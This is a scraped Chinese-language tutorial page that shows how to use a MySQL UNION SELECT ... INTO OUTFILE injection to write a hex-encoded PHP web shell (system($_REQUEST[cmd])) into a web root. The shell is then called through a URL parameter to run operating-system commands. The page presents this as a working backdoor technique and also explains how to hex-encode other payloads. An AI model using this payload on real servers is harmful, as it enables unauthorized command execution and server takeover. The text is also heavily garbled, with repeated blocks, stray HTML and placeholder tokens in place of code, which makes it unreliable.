简体中文(ZH-CN) English(EN) 繁体中文(ZH-TW) 日本語(JA) 한국어(KO) Melayu(MS) Français(FR) Deutsch(DE)
Home > Database > Mysql Tutorial > body text

运用Mysql语句生成后门木马的具体方法_MySQL

WBOY
Release: 2016-06-01 14:04:32
Original
1045 people have browsed it

MySQL语句

 

通过Mysql 的语句生成后门木马的方法:

 

<ccid_code></ccid_code>SELECT * FROM `vbb_strikes` WHERE 1 union select

2,3,0x3C3F7068702073797374656D28245F52455155455
3545B636D645D293B3F3E
 
from vbb_strikes into outfile 'c:/inetpub/wwwroot/cmd.php'
Copy after login
Copy after login
Copy after login
Copy after login

 

 

通过Mysql 的注入或者在 phpmyadmin 里运行以上语句,则会C:/inetpub/wwwroot/下生成 cmd.php 文件,内容为原来的 vbb_strikes 内容,后面紧跟着:

 

<ccid_code></ccid_code>2 3 <?php system(<span class="a14c" id="zoom"> 
<p style="TEXT-INDENT: 2em">通过Mysql 的语句生成后门木马的方法: </p>
<p style="TEXT-INDENT: 2em"> </p>
<ccid_nobr></ccid_nobr>
Copy after login
Copy after login
<ccid_code></ccid_code>SELECT * FROM `vbb_strikes` WHERE 1 union select

2,3,0x3C3F7068702073797374656D28245F52455155455
3545B636D645D293B3F3E
 
from vbb_strikes into outfile 'c:/inetpub/wwwroot/cmd.php'
Copy after login
Copy after login
Copy after login
Copy after login

 

 

通过Mysql 的注入或者在 phpmyadmin 里运行以上语句,则会C:/inetpub/wwwroot/下生成 cmd.php 文件,内容为原来的 vbb_strikes 内容,后面紧跟着:

 

___FCKpd___1
Copy after login
Copy after login

 

 

再通过 http://www.xxx.com/cmd.php?cmd=dir c:\ 就可以执行系统DOS命令!

 

问:那串0x3C3F7068702073797374656D28245F524551554553545B636D645D293B3F3E是什么?

 

答:就是下图代码中的十六进制编码,

 

<ccid_code></ccid_code><?php system(<span class="a14c" id="zoom"> 
<p style="TEXT-INDENT: 2em">通过Mysql 的语句生成后门木马的方法: </p>
<p style="TEXT-INDENT: 2em"> </p>
<ccid_nobr></ccid_nobr>
Copy after login
<ccid_code></ccid_code>SELECT * FROM `vbb_strikes` WHERE 1 union select

2,3,0x3C3F7068702073797374656D28245F52455155455
3545B636D645D293B3F3E
 
from vbb_strikes into outfile 'c:/inetpub/wwwroot/cmd.php'
Copy after login
Copy after login
Copy after login
Copy after login

 

 

通过Mysql 的注入或者在 phpmyadmin 里运行以上语句,则会C:/inetpub/wwwroot/下生成 cmd.php 文件,内容为原来的 vbb_strikes 内容,后面紧跟着:

 

<ccid_code></ccid_code>2 3 <?php system(<span class="a14c" id="zoom"> 
<p style="TEXT-INDENT: 2em">通过Mysql 的语句生成后门木马的方法: </p>
<p style="TEXT-INDENT: 2em"> </p>
<ccid_nobr></ccid_nobr>
Copy after login
Copy after login
<ccid_code></ccid_code>SELECT * FROM `vbb_strikes` WHERE 1 union select

2,3,0x3C3F7068702073797374656D28245F52455155455
3545B636D645D293B3F3E
 
from vbb_strikes into outfile 'c:/inetpub/wwwroot/cmd.php'
Copy after login
Copy after login
Copy after login
Copy after login

 

 

通过Mysql 的注入或者在 phpmyadmin 里运行以上语句,则会C:/inetpub/wwwroot/下生成 cmd.php 文件,内容为原来的 vbb_strikes 内容,后面紧跟着:

 

___FCKpd___1
Copy after login
Copy after login

 

 

再通过 http://www.xxx.com/cmd.php?cmd=dir c:\ 就可以执行系统DOS命令!

 

问:那串0x3C3F7068702073797374656D28245F524551554553545B636D645D293B3F3E是什么?

 

答:就是下图代码中的十六进制编码,

 

___FCKpd___2
Copy after login
Copy after login
Copy after login

 

如果不用这种方法,有不同的SQL版本会出现其它的编码:如%xx之类的,哪这个后门就不能执行了!如果你有其它语名要弄,可以到UltraEdit里输入,再按[Ctrl+H]键,将里面的十六进制连在一起就可以了!

REQUEST[cmd]);?>

 

 

再通过 http://www.xxx.com/cmd.php?cmd=dir c:\ 就可以执行系统DOS命令!

 

问:那串0x3C3F7068702073797374656D28245F524551554553545B636D645D293B3F3E是什么?

 

答:就是下图代码中的十六进制编码,

 

___FCKpd___2
Copy after login
Copy after login
Copy after login

 

如果不用这种方法,有不同的SQL版本会出现其它的编码:如%xx之类的,哪这个后门就不能执行了!如果你有其它语名要弄,可以到UltraEdit里输入,再按[Ctrl+H]键,将里面的十六进制连在一起就可以了!

REQUEST[cmd]);?>

 

如果不用这种方法,有不同的SQL版本会出现其它的编码:如%xx之类的,哪这个后门就不能执行了!如果你有其它语名要弄,可以到UltraEdit里输入,再按[Ctrl+H]键,将里面的十六进制连在一起就可以了!

REQUEST[cmd]);?>

 

 

再通过 http://www.xxx.com/cmd.php?cmd=dir c:\ 就可以执行系统DOS命令!

 

问:那串0x3C3F7068702073797374656D28245F524551554553545B636D645D293B3F3E是什么?

 

答:就是下图代码中的十六进制编码,

 

___FCKpd___2
Copy after login
Copy after login
Copy after login

 

如果不用这种方法,有不同的SQL版本会出现其它的编码:如%xx之类的,哪这个后门就不能执行了!如果你有其它语名要弄,可以到UltraEdit里输入,再按[Ctrl+H]键,将里面的十六进制连在一起就可以了!

Related labels:
specific method generate statement use
source:php.cn
Previous article:意料外的MySQL运算符可获更多数据功能_MySQL Next article:三方法优化MySQL数据库查询_MySQL
Statement of this Website
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn
Latest Articles by Author
Latest Issues
"Laravel One-To-Many relationships require data to be in the Model::all() output" I'm building an application that contains information about trees. Trees belong to many zo...
From 2023-09-14 22:56:53
0
1
346
ant-design conflicts with React and causes the application to crash, how to resolve the conflict? I upgraded to React18.2.0. Now sometimes the app freezes. The browser page stopped respond...
From 2023-09-12 11:16:02
0
1
336
Hide and show animated content: Create HTML pages with transition effects I'm trying to make a website that displays content in book form, with page-turning animati...
From 2023-09-10 17:41:45
0
1
287
Button position issue (CSS) I'm trying to design a chessboard but I'm running into a problem where White_Pawn7 appears...
From 2023-09-03 10:45:19
0
1
243
Want to display only rows with selected value using sql and php I have 40 providers and 10,000 products but I want to show 1 product from each provider Br...
From 2023-09-02 15:25:33
0
2
275
Related Topics
More>
Popular Recommendations
Popular Tutorials
More>
Related Tutorials
Popular Recommendations
Latest courses
Latest Downloads
More>
Web Effects
Website Source Code
Website Materials
Front End Template
About us Disclaimer Sitemap
php.cn:Public welfare online PHP training,Help PHP learners grow quickly!